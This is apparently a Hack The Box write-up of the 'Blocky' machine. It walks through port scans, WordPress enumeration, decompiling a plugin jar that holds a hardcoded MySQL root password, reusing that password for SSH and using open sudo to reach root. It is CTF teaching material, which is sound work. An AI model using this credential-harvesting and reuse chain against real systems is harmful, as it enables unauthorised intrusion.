Blocky
Contents
Ports scan
masscan
root@kali:~/HTB/Machines/Blocky# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.37 --rate=1000
Starting masscan 1.0.5 at 2019-11-18 19:26:08 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 80/tcp on 10.10.10.37 Discovered open port 22/tcp on 10.10.10.37 Discovered open port 25565/tcp on 10.10.10.37 Discovered open port 21/tcp on 10.10.10.37
nmap
root@kali:~/HTB/Machines/Blocky# nmap -sC -sV -p21,22,80,25565 10.10.10.37 Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-18 14:30 EST Nmap scan report for blocky.htb (10.10.10.37) Host is up (0.045s latency).
PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.5a 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA) | 256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA) |_ 256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-generator: WordPress 4.8 |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: BlockyCraft – Under Construction! 25565/tcp open minecraft Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.15 seconds
Web enumeration
root@kali:~/HTB/Machines/Blocky# python3 ../../Utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e "php,txt" -f -t 1000 -u http://10.10.10.37
_|. _ _ _ _ _ _|_ v0.3.8 (_||| _) (/_(_|| (_| )
Extensions: php, txt | HTTP method: get | Threads: 1000 | Wordlist size: 661562
Error Log: /root/HTB/Utils/dirsearch/logs/errors-19-11-18_14-37-00.log
Target: http://10.10.10.37
[14:37:00] Starting: [14:37:01] 301 - 0B - /index.php -> http://10.10.10.37/ [14:37:03] 200 - 2KB - /wp-login.php [14:37:03] 200 - 745B - /plugins/ [14:37:05] 200 - 19KB - /license.txt [14:37:07] 200 - 40KB - /wp-includes/ [14:37:09] 403 - 297B - /javascript/ [14:37:10] 200 - 0B - /wp-content/ [14:37:18] 403 - 290B - /.php [14:37:34] 403 - 292B - /icons/ [14:37:35] 200 - 380B - /wiki/ [14:37:47] 200 - 135B - /wp-trackback.php [14:38:04] 302 - 0B - /wp-admin/ -> http://10.10.10.37/wp-login.php?redirect_to=http%3A%2F%2F10.10.10.37%2Fwp-admin%2F&reauth=1 [14:38:35] 200 - 10KB - /phpmyadmin/ [14:39:19] 405 - 42B - /xmlrpc.php [14:43:17] 302 - 0B - /wp-signup.php -> http://10.10.10.37/wp-login.php?action=register [14:50:02] 403 - 300B - /server-status/
Task Completed
There is a Wordpress 4.8
There is a phpMyAdmin 4.5.4.1
And last but not least, there is the plugin folder with an unknown application.
Wordpress scan
root@kali:~/HTB/Machines/Blocky# wpscan --url http://10.10.10.37 -v --detection-mode aggressive --enumerate dbe,vp,vt,cb,u,m --api-token <WpVulnDB_API_TOCKEN> _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team Version 3.7.5 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_ _______________________________________________________________
[+] URL: http://10.10.10.37/ [+] Started: Mon Nov 18 16:43:49 2019
Interesting Finding(s):
[+] http://10.10.10.37/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://10.10.10.37/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100%
[+] Upload directory has listing enabled: http://10.10.10.37/wp-content/uploads/ | Found By: Direct Access (Aggressive Detection) | Confidence: 100%
[+] http://10.10.10.37/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.8 identified (Insecure, released on 2017-06-08). | Found By: Atom Generator (Aggressive Detection) | - http://10.10.10.37/index.php/feed/atom/, <generator uri="https://wordpress.org/" version="4.8">WordPress</generator> | Confirmed By: Opml Generator (Aggressive Detection) | - http://10.10.10.37/wp-links-opml.php, Match: 'generator="WordPress/4.8"' | | [!] 34 vulnerabilities identified: | | [!] Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection | Fixed in: 4.8.2 | References: | - https://wpvulndb.com/vulnerabilities/8905 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14723 | - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/ | - https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48 | - https://github.com/WordPress/WordPress/commit/fc930d3daed1c3acef010d04acc2c5de93cd18ec | | [!] Title: WordPress 2.9.2-4.8.1 - Open Redirect | Fixed in: 4.8.2 | References: | - https://wpvulndb.com/vulnerabilities/8910 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14725 | - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/ | - https://core.trac.wordpress.org/changeset/41398 | | [!] Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping | Fixed in: 4.8.2 | References: | - https://wpvulndb.com/vulnerabilities/8911 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14719 | - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/ | - https://core.trac.wordpress.org/changeset/41457 | | [!] Title: WordPress 4.4-4.8.1 - Path Traversal in Customizer | Fixed in: 4.8.2 | References: | - https://wpvulndb.com/vulnerabilities/8912 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14722 | - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/ | - https://core.trac.wordpress.org/changeset/41397 | | [!] Title: WordPress 4.4-4.8.1 - Cross-Site Scripting (XSS) in oEmbed | Fixed in: 4.8.2 | References: | - https://wpvulndb.com/vulnerabilities/8913 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14724 | - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/ | - https://core.trac.wordpress.org/changeset/41448 | | [!] Title: WordPress 4.2.3-4.8.1 - Authenticated Cross-Site Scripting (XSS) in Visual Editor | Fixed in: 4.8.2 | References: | - https://wpvulndb.com/vulnerabilities/8914 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14726 | - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/ | - https://core.trac.wordpress.org/changeset/41395 | - https://blog.sucuri.net/2017/09/stored-cross-site-scripting-vulnerability-in-wordpress-4-8-1.html | | [!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset | References: | - https://wpvulndb.com/vulnerabilities/8807 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295 | - https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html | - https://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html | - https://core.trac.wordpress.org/ticket/25239 | | [!] Title: WordPress <= 4.8.2 - $wpdb->prepare() Weakness | Fixed in: 4.8.3 | References: | - https://wpvulndb.com/vulnerabilities/8941 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16510 | - https://wordpress.org/news/2017/10/wordpress-4-8-3-security-release/ | - https://github.com/WordPress/WordPress/commit/a2693fd8602e3263b5925b9d799ddd577202167d | - https://twitter.com/ircmaxell/status/923662170092638208 | - https://blog.ircmaxell.com/2017/10/disclosure-wordpress-wpdb-sql-injection-technical.html | | [!] Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload | Fixed in: 4.8.4 | References: | - https://wpvulndb.com/vulnerabilities/8966 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17092 | - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/ | - https://github.com/WordPress/WordPress/commit/67d03a98c2cae5f41843c897f206adde299b0509 | | [!] Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping | Fixed in: 4.8.4 | References: | - https://wpvulndb.com/vulnerabilities/8967 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17094 | - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/ | - https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de | | [!] Title: WordPress 4.3.0-4.9 - HTML Language Attribute Escaping | Fixed in: 4.8.4 | References: | - https://wpvulndb.com/vulnerabilities/8968 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17093 | - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/ | - https://github.com/WordPress/WordPress/commit/3713ac5ebc90fb2011e98dfd691420f43da6c09a | | [!] Title: WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing | Fixed in: 4.8.4 | References: | - https://wpvulndb.com/vulnerabilities/8969 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17091 | - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/ | - https://github.com/WordPress/WordPress/commit/eaf1cfdc1fe0bdffabd8d879c591b864d833326c | | [!] Title: WordPress 3.7-4.9.1 - MediaElement Cross-Site Scripting (XSS) | Fixed in: 4.8.5 | References: | - https://wpvulndb.com/vulnerabilities/9006 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5776 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9263 | - https://github.com/WordPress/WordPress/commit/3fe9cb61ee71fcfadb5e002399296fcc1198d850 | - https://wordpress.org/news/2018/01/wordpress-4-9-2-security-and-maintenance-release/ | - https://core.trac.wordpress.org/ticket/42720 | | [!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched) | References: | - https://wpvulndb.com/vulnerabilities/9021 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389 | - https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html | - https://github.com/quitten/doser.py | - https://thehackernews.com/2018/02/wordpress-dos-exploit.html | | [!] Title: WordPress 3.7-4.9.4 - Remove localhost Default | Fixed in: 4.8.6 | References: | - https://wpvulndb.com/vulnerabilities/9053 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10101 | - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/ | - https://github.com/WordPress/WordPress/commit/804363859602d4050d9a38a21f5a65d9aec18216 | | [!] Title: WordPress 3.7-4.9.4 - Use Safe Redirect for Login | Fixed in: 4.8.6 | References: | - https://wpvulndb.com/vulnerabilities/9054 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10100 | - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/ | - https://github.com/WordPress/WordPress/commit/14bc2c0a6fde0da04b47130707e01df850eedc7e | | [!] Title: WordPress 3.7-4.9.4 - Escape Version in Generator Tag | Fixed in: 4.8.6 | References: | - https://wpvulndb.com/vulnerabilities/9055 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10102 | - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/ | - https://github.com/WordPress/WordPress/commit/31a4369366d6b8ce30045d4c838de2412c77850d | | [!] Title: WordPress <= 4.9.6 - Authenticated Arbitrary File Deletion | Fixed in: 4.8.7 | References: | - https://wpvulndb.com/vulnerabilities/9100 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12895 | - https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/ | - http://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit/ | - https://github.com/WordPress/WordPress/commit/c9dce0606b0d7e6f494d4abe7b193ac046a322cd | - https://wordpress.org/news/2018/07/wordpress-4-9-7-security-and-maintenance-release/ | - https://www.wordfence.com/blog/2018/07/details-of-an-additional-file-deletion-vulnerability-patched-in-wordpress-4-9-7/ | | [!] Title: WordPress <= 5.0 - Authenticated File Delete | Fixed in: 4.8.8 | References: | - https://wpvulndb.com/vulnerabilities/9169 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20147 | - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/ | | [!] Title: WordPress <= 5.0 - Authenticated Post Type Bypass | Fixed in: 4.8.8 | References: | - https://wpvulndb.com/vulnerabilities/9170 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20152 | - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/ | - https://blog.ripstech.com/2018/wordpress-post-type-privilege-escalation/ | | [!] Title: WordPress <= 5.0 - PHP Object Injection via Meta Data | Fixed in: 4.8.8 | References: | - https://wpvulndb.com/vulnerabilities/9171 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20148 | - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/ | | [!] Title: WordPress <= 5.0 - Authenticated Cross-Site Scripting (XSS) | Fixed in: 4.8.8 | References: | - https://wpvulndb.com/vulnerabilities/9172 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20153 | - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/ | | [!] Title: WordPress <= 5.0 - Cross-Site Scripting (XSS) that could affect plugins | Fixed in: 4.8.8 | References: | - https://wpvulndb.com/vulnerabilities/9173 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20150 | - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/ | - https://github.com/WordPress/WordPress/commit/fb3c6ea0618fcb9a51d4f2c1940e9efcd4a2d460 | | [!] Title: WordPress <= 5.0 - User Activation Screen Search Engine Indexing | Fixed in: 4.8.8 | References: | - https://wpvulndb.com/vulnerabilities/9174 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20151 | - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/ | | [!] Title: WordPress <= 5.0 - File Upload to XSS on Apache Web Servers | Fixed in: 4.8.8 | References: | - https://wpvulndb.com/vulnerabilities/9175 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20149 | - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/ | - https://github.com/WordPress/WordPress/commit/246a70bdbfac3bd45ff71c7941deef1bb206b19a | | [!] Title: WordPress 3.7-5.0 (except 4.9.9) - Authenticated Code Execution | Fixed in: 5.0.1 | References: | - https://wpvulndb.com/vulnerabilities/9222 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8942 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8943 | - https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/ | - https://www.rapid7.com/db/modules/exploit/multi/http/wp_crop_rce | | [!] Title: WordPress 3.9-5.1 - Comment Cross-Site Scripting (XSS) | Fixed in: 4.8.9 | References: | - https://wpvulndb.com/vulnerabilities/9230 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9787 | - https://github.com/WordPress/WordPress/commit/0292de60ec78c5a44956765189403654fe4d080b | - https://wordpress.org/news/2019/03/wordpress-5-1-1-security-and-maintenance-release/ | - https://blog.ripstech.com/2019/wordpress-csrf-to-rce/ | | [!] Title: WordPress <= 5.2.2 - Cross-Site Scripting (XSS) in URL Sanitisation | Fixed in: 4.8.10 | References: | - https://wpvulndb.com/vulnerabilities/9867 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16222 | - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/ | - https://github.com/WordPress/WordPress/commit/30ac67579559fe42251b5a9f887211bf61a8ed68 | - https://hackerone.com/reports/339483 | | [!] Title: WordPress <= 5.2.3 - Stored XSS in Customizer | Fixed in: 4.8.11 | References: | - https://wpvulndb.com/vulnerabilities/9908 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17674 | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/ | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html | | [!] Title: WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts | Fixed in: 4.8.11 | References: | - https://wpvulndb.com/vulnerabilities/9909 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17671 | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/ | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html | - https://github.com/WordPress/WordPress/commit/f82ed753cf00329a5e41f2cb6dc521085136f308 | - https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/ | | [!] Title: WordPress <= 5.2.3 - Stored XSS in Style Tags | Fixed in: 4.8.11 | References: | - https://wpvulndb.com/vulnerabilities/9910 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17672 | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/ | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html | | [!] Title: WordPress <= 5.2.3 - JSON Request Cache Poisoning | Fixed in: 4.8.11 | References: | - https://wpvulndb.com/vulnerabilities/9911 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17673 | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/ | - https://github.com/WordPress/WordPress/commit/b224c251adfa16a5f84074a3c0886270c9df38de | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html | | [!] Title: WordPress <= 5.2.3 - Server-Side Request Forgery (SSRF) in URL Validation | Fixed in: 4.8.11 | References: | - https://wpvulndb.com/vulnerabilities/9912 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17669 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17670 | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/ | - https://github.com/WordPress/WordPress/commit/9db44754b9e4044690a6c32fd74b9d5fe26b07b2 | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html | | [!] Title: WordPress <= 5.2.3 - Admin Referrer Validation | Fixed in: 4.8.11 | References: | - https://wpvulndb.com/vulnerabilities/9913 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17675 | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/ | - https://github.com/WordPress/WordPress/commit/b183fd1cca0b44a92f0264823dd9f22d2fd8b8d0 | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
[i] The main theme could not be detected.
[+] Enumerating Vulnerable Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Vulnerable Themes (via Aggressive Methods) Checking Known Locations - Time: 00:00:03 <=============================================================================================================================================================> (316 / 316) 100.00% Time: 00:00:03 [+] Checking Theme Versions (via Aggressive Methods)
[i] Theme(s) Identified:
[+] twentyfifteen | Location: http://10.10.10.37/wp-content/themes/twentyfifteen/ | Latest Version: 2.5 | Last Updated: 2019-05-07T00:00:00.000Z | Readme: http://10.10.10.37/wp-content/themes/twentyfifteen/readme.txt | Style URL: http://10.10.10.37/wp-content/themes/twentyfifteen/style.css | Style Name: Twenty Fifteen | Style URI: https://wordpress.org/themes/twentyfifteen/ | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, straightforward typography is readable on a wide variety of screen sizes, and suitable for multiple languages. We designed it using a mobile-first approach, meaning your content takes center-stage, regardless of whether your visitors arrive by smartphone, tablet, laptop, or desktop computer. | Author: the WordPress team | Author URI: https://wordpress.org/ | License: GNU General Public License v2 or later | License URI: http://www.gnu.org/licenses/gpl-2.0.html | Tags: blog, two-columns, left-sidebar, accessibility-ready, custom-background, custom-colors, custom-header, custom-logo, custom-menu, editor-style, featured-images, microformats, post-formats, rtl-language-support, sticky-post, threaded-comments, translation-ready | Text Domain: twentyfifteen | | Found By: Known Locations (Aggressive Detection) | | [!] 1 vulnerability identified: | | [!] Title: Twenty Fifteen Theme <= 1.1 - DOM Cross-Site Scripting (XSS) | Fixed in: 1.2 | References: | - https://wpvulndb.com/vulnerabilities/7965 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3429 | - https://blog.sucuri.net/2015/05/jetpack-and-twentyfifteen-vulnerable-to-dom-based-xss-millions-of-wordpress-websites-affected-millions-of-wordpress-websites-affected.html | - https://packetstormsecurity.com/files/131802/ | - https://seclists.org/fulldisclosure/2015/May/41 | | The version could not be determined.
[+] Enumerating Config Backups (via Aggressive Methods) Checking Config Backups - Time: 00:00:00 <================================================================================================================================================================> (21 / 21) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Enumerating DB Exports (via Aggressive Methods) Checking DB Exports - Time: 00:00:00 <====================================================================================================================================================================> (36 / 36) 100.00% Time: 00:00:00
[i] No DB Exports Found.
[+] Enumerating Medias (via Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected) Brute Forcing Attachment IDs - Time: 00:00:01 <=========================================================================================================================================================> (100 / 100) 100.00% Time: 00:00:01
[i] No Medias Found.
[+] Enumerating Users (via Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:00 <===============================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] notch | Found By: Wp Json Api (Aggressive Detection) | - http://10.10.10.37/index.php/wp-json/wp/v2/users/?per_page=100&page=1 | Confirmed By: | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection)
[+] WPVulnDB API OK | Plan: free | Requests Done (during the scan): 0 | Requests Remaining: 46
[+] Finished: Mon Nov 18 16:43:56 2019 [+] Requests Done: 489 [+] Cached Requests: 46 [+] Data Sent: 111.264 KB [+] Data Received: 90.001 KB [+] Memory used: 169.241 MB [+] Elapsed time: 00:00:07
There are a lot of vulnerabilities, but we enumerate a user.
Folder plugins
2 files:
- BlockyCore.jar
- griefprevention-1.11.2-3.1.1.298.jar
root@kali:~/HTB/Machines/Blocky/wordpress/plugins# unzip BlockyCore.jar Archive: BlockyCore.jar inflating: META-INF/MANIFEST.MF inflating: com/myfirstplugin/BlockyCore.class
root@kali:~/HTB/Machines/Blocky/wordpress/plugins/com/myfirstplugin# jad BlockyCore.class Parsing BlockyCore.class...The class file version is 52.0 (only 45.3, 46.0 and 47.0 are supported) Generating BlockyCore.jad
root@kali:~/HTB/Machines/Blocky/wordpress/plugins/com/myfirstplugin# cat BlockyCore.jad // Decompiled by Jad v1.5.8e. Copyright 2001 Pavel Kouznetsov. // Jad home page: http://www.geocities.com/kpdus/jad.html // Decompiler options: packimports(3) // Source File Name: BlockyCore.java
package com.myfirstplugin;
public class BlockyCore {
public BlockyCore() { sqlHost = "localhost"; sqlUser = "root"; sqlPass = "8YsqfCTnvxAUeduzjNSXe22"; } ...
We found a the mysql root password :)
This password doesn't work with wordpress and user notch.
But it works (as expected with phpMyAdmin)
Because, we found a user and a password, and the port 22 is open, why not to try it?
root@kali:~/HTB/Machines/Blocky# ssh notch@10.10.10.37 notch@10.10.10.37's password: Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)
* Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage
7 packages can be updated. 7 updates are security updates.
Last login: Tue Jul 25 11:14:53 2017 from 10.10.14.230
notch@Blocky:~$
Bingo, I opened a shell.
User Flag
notch@Blocky:~$ cat user.txt <USER_FLAG>
Root flag
notch@Blocky:~$ whoami notch notch@Blocky:~$ sudo -l [sudo] password for notch: Matching Defaults entries for notch on Blocky: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User notch may run the following commands on Blocky: (ALL : ALL) ALL notch@Blocky:~$ sudo -i root@Blocky:~# cat root.txt <ROOT_FLAG>root@Blocky:~#
I didn't expect an opened sudo :)
References
Daniel Simao 17:56, 21 November 2019 (EST)